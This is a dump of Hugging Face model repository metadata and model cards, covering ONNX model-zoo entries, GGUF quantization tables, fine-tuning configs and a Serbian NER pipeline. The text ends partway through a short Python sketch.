| modelId | author | last_modified | downloads | likes | library_name | tags | pipeline_tag | createdAt | card |
|---|---|---|---|---|---|---|---|---|---|
| string | string | timestamp[us, tz=UTC] | int64 | int64 | string | list | string | timestamp[us, tz=UTC] | string |
qingy2024/Ling-Mini-2.0-Identity
|
qingy2024
| 2025-09-23T18:48:01Z | 0 | 0 |
transformers
|
[
"transformers",
"safetensors",
"feature-extraction",
"llama-factory",
"full",
"text-generation",
"conversational",
"custom_code",
"base_model:inclusionAI/Ling-mini-2.0",
"base_model:finetune:inclusionAI/Ling-mini-2.0",
"license:other",
"region:us"
] |
text-generation
| 2025-09-23T18:24:06Z |
---
library_name: transformers
license: other
base_model: inclusionAI/Ling-mini-2.0
tags:
- llama-factory
- full
model-index:
- name: outputs
results: []
pipeline_tag: text-generation
---
# Ling Mini 2.0 Identity
This model is a fine-tuned version of [inclusionAI/Ling-mini-2.0](https://huggingface.co/inclusionAI/Ling-mini-2.0) on the identity dataset (from LLaMA-Factory).
## Training procedure
Full fine-tuning with DeepSpeed ZeRO-3 offloading on 4× A100 80GB GPUs. For a faster setup, you can use the `qingy1337/llamafactory-cu128:latest` Docker image.
### Training hyperparameters
The following hyperparameters were used during training:
```
model_name_or_path: inclusionAI/Ling-mini-2.0
trust_remote_code: true
### method
stage: sft
do_train: true
finetuning_type: full
deepspeed: examples/deepspeed/ds_z3_config.json
### dataset
dataset: identity
template: bailing_v2
cutoff_len: 8192
max_samples: 10000000000
overwrite_cache: true
preprocessing_num_workers: 16
### output
output_dir: ./outputs/
logging_steps: 1
save_steps: 10000000000
save_only_model: true
plot_loss: true
overwrite_output_dir: true
report_to: wandb
run_name: Test-FT
### train
per_device_train_batch_size: 2
gradient_accumulation_steps: 1
learning_rate: 1.0e-6
num_train_epochs: 10.0
lr_scheduler_type: cosine
warmup_ratio: 0.2
bf16: true
ddp_timeout: 180000000
resume_from_checkpoint: null
```
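As a rough illustration (not part of the original training code), the learning-rate shape implied by `lr_scheduler_type: cosine` with `warmup_ratio: 0.2` and `learning_rate: 1.0e-6` can be sketched as:

```python
import math

def lr_at(step, total_steps, peak_lr=1.0e-6, warmup_ratio=0.2):
    """Linear warmup followed by cosine decay to zero."""
    warmup_steps = int(total_steps * warmup_ratio)
    if step < warmup_steps:
        return peak_lr * step / max(1, warmup_steps)
    progress = (step - warmup_steps) / max(1, total_steps - warmup_steps)
    return peak_lr * 0.5 * (1.0 + math.cos(math.pi * progress))

print(lr_at(200, 1000))   # end of warmup: the peak learning rate
print(lr_at(1000, 1000))  # end of training: decayed to ~0
```

The peak is reached after the first 20% of steps, then the rate follows a half-cosine down to zero.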
### Framework versions
- Transformers 4.56.1
- Pytorch 2.8.0+cu128
- Datasets 4.0.0
- Tokenizers 0.22.1
|
onnxmodelzoo/mobilenetv2_120d_Opset16
|
onnxmodelzoo
| 2025-09-23T18:46:19Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:46:13Z |
---
language: en
license: apache-2.0
model_name: mobilenetv2_120d_Opset16.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/mobilenet_v3_large_Opset18
|
onnxmodelzoo
| 2025-09-23T18:45:56Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:45:50Z |
---
language: en
license: apache-2.0
model_name: mobilenet_v3_large_Opset18.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/mobilenet_v3_large_Opset16
|
onnxmodelzoo
| 2025-09-23T18:45:44Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:45:38Z |
---
language: en
license: apache-2.0
model_name: mobilenet_v3_large_Opset16.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/mobilenet_v2_Opset16
|
onnxmodelzoo
| 2025-09-23T18:45:27Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:45:20Z |
---
language: en
license: apache-2.0
model_name: mobilenet_v2_Opset16.onnx
tags:
- Computer_Vision
- skip
---
|
galuis116/99cb632d-d56d-40af-a524-726b6403f2f7
|
galuis116
| 2025-09-23T18:43:13Z | 0 | 0 |
peft
|
[
"peft",
"safetensors",
"llama",
"axolotl",
"generated_from_trainer",
"base_model:JackFram/llama-68m",
"base_model:adapter:JackFram/llama-68m",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:40:07Z |
---
library_name: peft
license: apache-2.0
base_model: JackFram/llama-68m
tags:
- axolotl
- generated_from_trainer
model-index:
- name: 99cb632d-d56d-40af-a524-726b6403f2f7
results: []
---
<!-- This model card has been generated automatically according to the information the Trainer had access to. You
should probably proofread and complete it, then remove this comment. -->
[<img src="https://raw.githubusercontent.com/axolotl-ai-cloud/axolotl/main/image/axolotl-badge-web.png" alt="Built with Axolotl" width="200" height="32"/>](https://github.com/axolotl-ai-cloud/axolotl)
<details><summary>See axolotl config</summary>
axolotl version: `0.4.1`
```yaml
adapter: lora
base_model: JackFram/llama-68m
bf16: auto
chat_template: llama3
dataset_prepared_path: null
datasets:
- data_files:
- a6d1239a59b968ae_train_data.json
ds_type: json
format: custom
path: /workspace/input_data/
type:
field_input: input
field_instruction: instruction
field_output: output
field_system: system
format: '{instruction} {input}'
no_input_format: '{instruction}'
system_format: '{system}'
system_prompt: ''
debug: null
deepspeed: null
early_stopping_patience: null
eval_max_new_tokens: 128
eval_table_size: null
evals_per_epoch: 4
flash_attention: false
fp16: null
fsdp: null
fsdp_config: null
gradient_accumulation_steps: 4
gradient_checkpointing: false
group_by_length: false
hub_model_id: galuis116/99cb632d-d56d-40af-a524-726b6403f2f7
learning_rate: 0.0002
load_in_4bit: false
load_in_8bit: false
local_rank: null
logging_steps: 1
lora_alpha: 16
lora_dropout: 0.05
lora_fan_in_fan_out: null
lora_model_dir: null
lora_r: 8
lora_target_linear: true
lr_scheduler: cosine
max_steps: 10
micro_batch_size: 2
mlflow_experiment_name: /tmp/a6d1239a59b968ae_train_data.json
model_type: AutoModelForCausalLM
num_epochs: 1
optimizer: adamw_bnb_8bit
output_dir: /root/.cache/huggingface/hub/trained_repo
pad_to_sequence_len: true
resume_from_checkpoint: null
s2_attention: null
sample_packing: false
saves_per_epoch: 4
sequence_len: 512
special_tokens:
pad_token: </s>
strict: false
tf32: false
tokenizer_type: AutoTokenizer
train_on_inputs: false
trust_remote_code: true
val_set_size: 0.05
wandb_entity: null
wandb_mode: offline
wandb_name: afb726d6-37e8-4e63-8423-3aaef8c91a46
wandb_project: Gradients-On-Demand
wandb_run: your_name
wandb_runid: afb726d6-37e8-4e63-8423-3aaef8c91a46
warmup_steps: 10
weight_decay: 0.0
xformers_attention: null
```
</details><br>
# 99cb632d-d56d-40af-a524-726b6403f2f7
This model is a fine-tuned version of [JackFram/llama-68m](https://huggingface.co/JackFram/llama-68m) on an unspecified dataset.
It achieves the following results on the evaluation set:
- Loss: 3.0757
## Model description
More information needed
## Intended uses & limitations
More information needed
## Training and evaluation data
More information needed
## Training procedure
### Training hyperparameters
The following hyperparameters were used during training:
- learning_rate: 0.0002
- train_batch_size: 2
- eval_batch_size: 2
- seed: 42
- gradient_accumulation_steps: 4
- total_train_batch_size: 8
- optimizer: 8-bit AdamW (bitsandbytes) with betas=(0.9, 0.999), epsilon=1e-08, and no additional optimizer arguments
- lr_scheduler_type: cosine
- lr_scheduler_warmup_steps: 10
- training_steps: 10
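As a quick arithmetic check (not part of the training code), the reported total train batch size follows from the config values above, assuming a single device:

```python
# total_train_batch_size = per-device batch x gradient accumulation x device count
micro_batch_size = 2             # per_device_train_batch_size
gradient_accumulation_steps = 4
num_devices = 1                  # assumed here

total_train_batch_size = micro_batch_size * gradient_accumulation_steps * num_devices
print(total_train_batch_size)  # -> 8, matching the value reported above
```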
### Training results
| Training Loss | Epoch | Step | Validation Loss |
|:-------------:|:------:|:----:|:---------------:|
| 2.7976 | 0.0003 | 1 | 3.1003 |
| 3.0069 | 0.0009 | 3 | 3.0997 |
| 2.845 | 0.0017 | 6 | 3.0930 |
| 2.8102 | 0.0026 | 9 | 3.0757 |
### Framework versions
- PEFT 0.13.2
- Transformers 4.46.0
- Pytorch 2.5.0+cu124
- Datasets 3.0.1
- Tokenizers 0.20.1
|
onnxmodelzoo/mixer_b16_224_in21k_Opset16
|
onnxmodelzoo
| 2025-09-23T18:38:07Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:37:48Z |
---
language: en
license: apache-2.0
model_name: mixer_b16_224_in21k_Opset16.onnx
tags:
- Computer_Vision
- skip
---
|
mradermacher/Qwen3-MoE-Tiny-GGUF
|
mradermacher
| 2025-09-23T18:36:40Z | 0 | 0 | null |
[
"region:us"
] | null | 2025-09-23T18:36:39Z |
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
<!-- ### quants: x-f16 Q4_K_S Q2_K Q8_0 Q6_K Q3_K_M Q3_K_S Q3_K_L Q4_K_M Q5_K_S Q5_K_M IQ4_XS -->
<!-- ### quants_skip: -->
<!-- ### skip_mmproj: -->
static quants of https://huggingface.co/keatone/Qwen3-MoE-Tiny
|
onnxmodelzoo/gcresnext26ts_Opset18
|
onnxmodelzoo
| 2025-09-23T18:36:27Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:36:21Z |
---
language: en
license: apache-2.0
model_name: gcresnext26ts_Opset18.onnx
tags:
- Computer_Vision
- skip
---
|
iamthe66epitaph/Erebus
|
iamthe66epitaph
| 2025-09-23T18:36:26Z | 0 | 0 | null |
[
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:36:26Z |
---
license: apache-2.0
---
|
onnxmodelzoo/efficientnet_v2_m_Opset16
|
onnxmodelzoo
| 2025-09-23T18:35:08Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:34:50Z |
---
language: en
license: apache-2.0
model_name: efficientnet_v2_m_Opset16.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/edgenext_xx_small_Opset18
|
onnxmodelzoo
| 2025-09-23T18:33:31Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:33:26Z |
---
language: en
license: apache-2.0
model_name: edgenext_xx_small_Opset18.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/edgenext_xx_small_Opset16
|
onnxmodelzoo
| 2025-09-23T18:33:21Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:33:15Z |
---
language: en
license: apache-2.0
model_name: edgenext_xx_small_Opset16.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/dpn68_Opset17
|
onnxmodelzoo
| 2025-09-23T18:32:58Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:32:51Z |
---
language: en
license: apache-2.0
model_name: dpn68_Opset17.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/dpn68_Opset16
|
onnxmodelzoo
| 2025-09-23T18:32:50Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:32:42Z |
---
language: en
license: apache-2.0
model_name: dpn68_Opset16.onnx
tags:
- Computer_Vision
- skip
---
|
Arjenc/NN
|
Arjenc
| 2025-09-23T18:30:31Z | 0 | 0 | null |
[
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:30:30Z |
---
license: apache-2.0
---
|
onnxmodelzoo/deit_base_patch16_224_Opset18
|
onnxmodelzoo
| 2025-09-23T18:24:41Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:24:14Z |
---
language: en
license: apache-2.0
model_name: deit_base_patch16_224_Opset18.onnx
tags:
- Computer_Vision
- skip
---
|
mradermacher/MD-Coder-Qwen3-8B-GGUF
|
mradermacher
| 2025-09-23T18:24:06Z | 0 | 0 |
transformers
|
[
"transformers",
"gguf",
"text-generation-inference",
"unsloth",
"qwen3",
"en",
"base_model:FredericFan/MD-Coder-Qwen3-8B",
"base_model:quantized:FredericFan/MD-Coder-Qwen3-8B",
"license:apache-2.0",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2025-09-23T18:12:22Z |
---
base_model: FredericFan/MD-Coder-Qwen3-8B
language:
- en
library_name: transformers
license: apache-2.0
mradermacher:
readme_rev: 1
quantized_by: mradermacher
tags:
- text-generation-inference
- transformers
- unsloth
- qwen3
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
<!-- ### quants: x-f16 Q4_K_S Q2_K Q8_0 Q6_K Q3_K_M Q3_K_S Q3_K_L Q4_K_M Q5_K_S Q5_K_M IQ4_XS -->
<!-- ### quants_skip: -->
<!-- ### skip_mmproj: -->
static quants of https://huggingface.co/FredericFan/MD-Coder-Qwen3-8B
<!-- provided-files -->
***For a convenient overview and download list, visit our [model page for this model](https://hf.tst.eu/model#MD-Coder-Qwen3-8B-GGUF).***
weighted/imatrix quants seem not to be available (by me) at this time. If they do not show up a week or so after the static ones, I have probably not planned for them. Feel free to request them by opening a Community Discussion.
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
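For the legacy split format described in those READMEs (parts named like `model.gguf-split-a`, `model.gguf-split-b`, ...), the parts are plain byte slices, so joining them is simple concatenation. This is a generic sketch under that assumption, not a tool shipped with this repo; newer multi-part releases (files named `...-00001-of-0000N.gguf`) should instead be merged with llama.cpp's `gguf-split` utility:

```python
import glob

def join_parts(prefix, out_path):
    """Concatenate split files (prefix + 'a', 'b', ...) into one file, in order."""
    parts = sorted(glob.glob(prefix + "*"))
    with open(out_path, "wb") as out:
        for part in parts:
            with open(part, "rb") as f:
                out.write(f.read())
    return parts
```

On Linux, `cat model.gguf-split-* > model.gguf` achieves the same result.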
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/MD-Coder-Qwen3-8B-GGUF/resolve/main/MD-Coder-Qwen3-8B.Q2_K.gguf) | Q2_K | 0.9 | |
| [GGUF](https://huggingface.co/mradermacher/MD-Coder-Qwen3-8B-GGUF/resolve/main/MD-Coder-Qwen3-8B.Q3_K_S.gguf) | Q3_K_S | 1.0 | |
| [GGUF](https://huggingface.co/mradermacher/MD-Coder-Qwen3-8B-GGUF/resolve/main/MD-Coder-Qwen3-8B.Q3_K_M.gguf) | Q3_K_M | 1.0 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/MD-Coder-Qwen3-8B-GGUF/resolve/main/MD-Coder-Qwen3-8B.Q3_K_L.gguf) | Q3_K_L | 1.1 | |
| [GGUF](https://huggingface.co/mradermacher/MD-Coder-Qwen3-8B-GGUF/resolve/main/MD-Coder-Qwen3-8B.IQ4_XS.gguf) | IQ4_XS | 1.1 | |
| [GGUF](https://huggingface.co/mradermacher/MD-Coder-Qwen3-8B-GGUF/resolve/main/MD-Coder-Qwen3-8B.Q4_K_S.gguf) | Q4_K_S | 1.2 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/MD-Coder-Qwen3-8B-GGUF/resolve/main/MD-Coder-Qwen3-8B.Q4_K_M.gguf) | Q4_K_M | 1.2 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/MD-Coder-Qwen3-8B-GGUF/resolve/main/MD-Coder-Qwen3-8B.Q5_K_S.gguf) | Q5_K_S | 1.3 | |
| [GGUF](https://huggingface.co/mradermacher/MD-Coder-Qwen3-8B-GGUF/resolve/main/MD-Coder-Qwen3-8B.Q5_K_M.gguf) | Q5_K_M | 1.4 | |
| [GGUF](https://huggingface.co/mradermacher/MD-Coder-Qwen3-8B-GGUF/resolve/main/MD-Coder-Qwen3-8B.Q6_K.gguf) | Q6_K | 1.5 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/MD-Coder-Qwen3-8B-GGUF/resolve/main/MD-Coder-Qwen3-8B.Q8_0.gguf) | Q8_0 | 1.9 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/MD-Coder-Qwen3-8B-GGUF/resolve/main/MD-Coder-Qwen3-8B.f16.gguf) | f16 | 3.5 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
Tanor/sr_jerteh_ner_nel
|
Tanor
| 2025-09-23T18:21:49Z | 0 | 0 | null |
[
"region:us"
] | null | 2025-09-23T18:21:48Z |
---
tags:
- spacy
- token-classification
language:
- sr
model-index:
- name: sr_jerteh_ner_nel
results:
- task:
name: NER
type: token-classification
metrics:
- name: NER Precision
type: precision
value: 0.90833429
- name: NER Recall
type: recall
value: 0.9064093018
- name: NER F Score
type: f_score
value: 0.9073707749
- task:
name: SENTS
type: token-classification
metrics:
- name: Sentences F-Score
type: f_score
value: 0.9694144864
---
| Feature | Description |
| --- | --- |
| **Name** | `sr_jerteh_ner_nel` |
| **Version** | `1.0.0` |
| **spaCy** | `>=3.8.7,<3.9.0` |
| **Default Pipeline** | `transformer`, `senter`, `ner`, `entity_linker` |
| **Components** | `transformer`, `senter`, `ner`, `entity_linker` |
| **Vectors** | 0 keys, 0 unique vectors (0 dimensions) |
| **Sources** | n/a |
| **License** | n/a |
| **Author** | [n/a]() |
### Label Scheme
<details>
<summary>View label scheme (10 labels for 1 components)</summary>
| Component | Labels |
| --- | --- |
| **`ner`** | `*`, `DEMO`, `EVENT`, `LOC`, `ORG`, `PERS`, `PRODUCT`, `ROLE`, `WORK`, `http://www.wikidata.org/entity/Q2829275` |
</details>
### Accuracy
| Type | Score |
| --- | --- |
| `SENTS_F` | 96.94 |
| `SENTS_P` | 96.96 |
| `SENTS_R` | 96.92 |
| `ENTS_F` | 90.74 |
| `ENTS_P` | 90.83 |
| `ENTS_R` | 90.64 |
| `NEL_MICRO_F` | 65.29 |
| `NEL_MICRO_R` | 52.82 |
| `NEL_MICRO_P` | 85.47 |
| `TRANSFORMER_LOSS` | 586650.79 |
| `SENTER_LOSS` | 37353.44 |
| `NER_LOSS` | 274797.35 |
| `ENTITY_LINKER_LOSS` | 6046.12 |
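The F-scores in the metadata and table above are the harmonic mean of the corresponding precision and recall, which is easy to verify (a generic check, not part of the released pipeline):

```python
def f_score(precision, recall):
    """Harmonic mean of precision and recall (F1)."""
    return 2 * precision * recall / (precision + recall)

# NER: P=0.90833429, R=0.9064093018 -> F matches the reported 0.9073707749
print(round(f_score(0.90833429, 0.9064093018), 4))
# Entity linking (micro): P=85.47, R=52.82 -> F matches the reported 65.29
print(round(f_score(85.47, 52.82), 2))
```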
|
onnxmodelzoo/crossvit_base_240_Opset16
|
onnxmodelzoo
| 2025-09-23T18:19:46Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:19:13Z |
---
language: en
license: apache-2.0
model_name: crossvit_base_240_Opset16.onnx
tags:
- Computer_Vision
- skip
---
|
manifestai/powercoder-3b
|
manifestai
| 2025-09-23T18:19:14Z | 0 | 0 | null |
[
"safetensors",
"powercoder",
"license:cc-by-4.0",
"region:us"
] | null | 2025-09-23T15:11:35Z |
---
license: cc-by-4.0
---
PowerCoder-3B is a retrained StarCoder2-3B, metamorphosed to use power retention with p=2.
The retraining dataset was the-stack-smol-v2 with FIM, reweighted to sample Python more frequently.
To get the power retention kernels, use `pip install retention`.
|
onnxmodelzoo/crossvit_18_dagger_240_Opset17
|
onnxmodelzoo
| 2025-09-23T18:18:34Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:18:17Z |
---
language: en
license: apache-2.0
model_name: crossvit_18_dagger_240_Opset17.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/crossvit_18_dagger_240_Opset16
|
onnxmodelzoo
| 2025-09-23T18:18:17Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:18:01Z |
---
language: en
license: apache-2.0
model_name: crossvit_18_dagger_240_Opset16.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/crossvit_18_240_Opset17
|
onnxmodelzoo
| 2025-09-23T18:18:01Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:17:38Z |
---
language: en
license: apache-2.0
model_name: crossvit_18_240_Opset17.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/crossvit_15_dagger_240_Opset17
|
onnxmodelzoo
| 2025-09-23T18:17:21Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:17:10Z |
---
language: en
license: apache-2.0
model_name: crossvit_15_dagger_240_Opset17.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/convnext_xlarge_384_in22ft1k_Opset16
|
onnxmodelzoo
| 2025-09-23T18:11:30Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:09:57Z |
---
language: en
license: apache-2.0
model_name: convnext_xlarge_384_in22ft1k_Opset16.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/convnext_tiny_in22k_Opset17
|
onnxmodelzoo
| 2025-09-23T18:09:57Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:09:40Z |
---
language: en
license: apache-2.0
model_name: convnext_tiny_in22k_Opset17.onnx
tags:
- Computer_Vision
- skip
---
|
lolzinventor/Qwen3-8B-BeyondReality
|
lolzinventor
| 2025-09-23T18:09:35Z | 0 | 0 | null |
[
"safetensors",
"qwen3",
"base_model:Qwen/Qwen3-8B",
"base_model:finetune:Qwen/Qwen3-8B",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T09:55:08Z |
---
license: apache-2.0
base_model:
- Qwen/Qwen3-8B
---

# Model Card for Beyond Reality
## Model Details
### Basic Information
- **Model Type:** Language Model
- **Base Model:** Qwen/Qwen3-8B
- **Training Type:** Fine-tuned
- **Version:** 1.0
- **Language(s):** English
### Model Architecture
- Architecture: Qwen/Qwen3-8B
- Parameters: 8 billion
- Training Procedure: Fine-tuned on a custom dataset of interactive fiction scenarios
## Intended Use
- **Primary intended uses:** Interactive storytelling, text-based adventure games, narrative exploration
- **Primary intended users:** Game developers, writers, AI researchers, interactive fiction enthusiasts
## Limitations and Bias
- Limited to 5-6 coherent actions in sequence before potential degradation
- May exhibit biases present in the base Qwen3 model and the fine-tuning dataset
- Not suitable for factual information retrieval or real-world decision making
## Training Data
Fine-tuned on a proprietary dataset of interactive fiction scenarios, featuring:
- Multi-choice action systems (options A-D)
- Custom user-defined actions (E+)
- Various narrative genres and settings
## Performance and Evaluation
- Maintains coherence for 5-6 sequential actions on average
- Evaluated primarily through user testing and narrative consistency
- Because the model is already small, quantization noticeably reduces its ability to follow the multiple-choice narrative
## Ethical Considerations
- Model outputs are fictional and should not be used as a source of factual information
- Users should be aware of potential biases in generated content
|
onnxmodelzoo/convnext_tiny_384_in22ft1k_Opset18
|
onnxmodelzoo
| 2025-09-23T18:08:45Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:08:33Z |
---
language: en
license: apache-2.0
model_name: convnext_tiny_384_in22ft1k_Opset18.onnx
tags:
- Computer_Vision
- skip
---
|
onnxmodelzoo/convnext_tiny_384_in22ft1k_Opset16
|
onnxmodelzoo
| 2025-09-23T18:08:21Z | 0 | 0 | null |
[
"onnx",
"Computer_Vision",
"skip",
"en",
"license:apache-2.0",
"region:us"
] | null | 2025-09-23T18:08:09Z |
---
language: en
license: apache-2.0
model_name: convnext_tiny_384_in22ft1k_Opset16.onnx
tags:
- Computer_Vision
- skip
---
|
mradermacher/Qwen2.5-HumanLike-DPO-GGUF
|
mradermacher
| 2025-09-23T18:07:33Z | 0 | 0 |
transformers
|
[
"transformers",
"gguf",
"en",
"base_model:littletramp/Qwen2.5-HumanLike-DPO",
"base_model:quantized:littletramp/Qwen2.5-HumanLike-DPO",
"endpoints_compatible",
"region:us",
"conversational"
] | null | 2025-09-23T17:58:17Z |
---
base_model: littletramp/Qwen2.5-HumanLike-DPO
language:
- en
library_name: transformers
mradermacher:
readme_rev: 1
quantized_by: mradermacher
tags: []
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
<!-- ### quants: x-f16 Q4_K_S Q2_K Q8_0 Q6_K Q3_K_M Q3_K_S Q3_K_L Q4_K_M Q5_K_S Q5_K_M IQ4_XS -->
<!-- ### quants_skip: -->
<!-- ### skip_mmproj: -->
static quants of https://huggingface.co/littletramp/Qwen2.5-HumanLike-DPO
<!-- provided-files -->
***For a convenient overview and download list, visit our [model page for this model](https://hf.tst.eu/model#Qwen2.5-HumanLike-DPO-GGUF).***
weighted/imatrix quants seem not to be available (by me) at this time. If they do not show up a week or so after the static ones, I have probably not planned for them. Feel free to request them by opening a Community Discussion.
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/Qwen2.5-HumanLike-DPO-GGUF/resolve/main/Qwen2.5-HumanLike-DPO.Q2_K.gguf) | Q2_K | 0.8 | |
| [GGUF](https://huggingface.co/mradermacher/Qwen2.5-HumanLike-DPO-GGUF/resolve/main/Qwen2.5-HumanLike-DPO.Q3_K_S.gguf) | Q3_K_S | 0.9 | |
| [GGUF](https://huggingface.co/mradermacher/Qwen2.5-HumanLike-DPO-GGUF/resolve/main/Qwen2.5-HumanLike-DPO.Q3_K_M.gguf) | Q3_K_M | 0.9 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/Qwen2.5-HumanLike-DPO-GGUF/resolve/main/Qwen2.5-HumanLike-DPO.Q3_K_L.gguf) | Q3_K_L | 1.0 | |
| [GGUF](https://huggingface.co/mradermacher/Qwen2.5-HumanLike-DPO-GGUF/resolve/main/Qwen2.5-HumanLike-DPO.IQ4_XS.gguf) | IQ4_XS | 1.0 | |
| [GGUF](https://huggingface.co/mradermacher/Qwen2.5-HumanLike-DPO-GGUF/resolve/main/Qwen2.5-HumanLike-DPO.Q4_K_S.gguf) | Q4_K_S | 1.0 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Qwen2.5-HumanLike-DPO-GGUF/resolve/main/Qwen2.5-HumanLike-DPO.Q4_K_M.gguf) | Q4_K_M | 1.1 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/Qwen2.5-HumanLike-DPO-GGUF/resolve/main/Qwen2.5-HumanLike-DPO.Q5_K_S.gguf) | Q5_K_S | 1.2 | |
| [GGUF](https://huggingface.co/mradermacher/Qwen2.5-HumanLike-DPO-GGUF/resolve/main/Qwen2.5-HumanLike-DPO.Q5_K_M.gguf) | Q5_K_M | 1.2 | |
| [GGUF](https://huggingface.co/mradermacher/Qwen2.5-HumanLike-DPO-GGUF/resolve/main/Qwen2.5-HumanLike-DPO.Q6_K.gguf) | Q6_K | 1.4 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/Qwen2.5-HumanLike-DPO-GGUF/resolve/main/Qwen2.5-HumanLike-DPO.Q8_0.gguf) | Q8_0 | 1.7 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/Qwen2.5-HumanLike-DPO-GGUF/resolve/main/Qwen2.5-HumanLike-DPO.f16.gguf) | f16 | 3.2 | 16 bpw, overkill |
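One rough way to read the table is to back-compute bits per weight from the file sizes, taking the f16 file (16 bits per weight) as the reference for the parameter count. This sketch treats "GB" as decimal gigabytes, which is an approximation:

```python
F16_SIZE_GB = 3.2                 # from the table; f16 stores 16 bits per weight
n_params = F16_SIZE_GB * 1e9 / 2  # 2 bytes per weight -> ~1.6e9 parameters

def bits_per_weight(size_gb):
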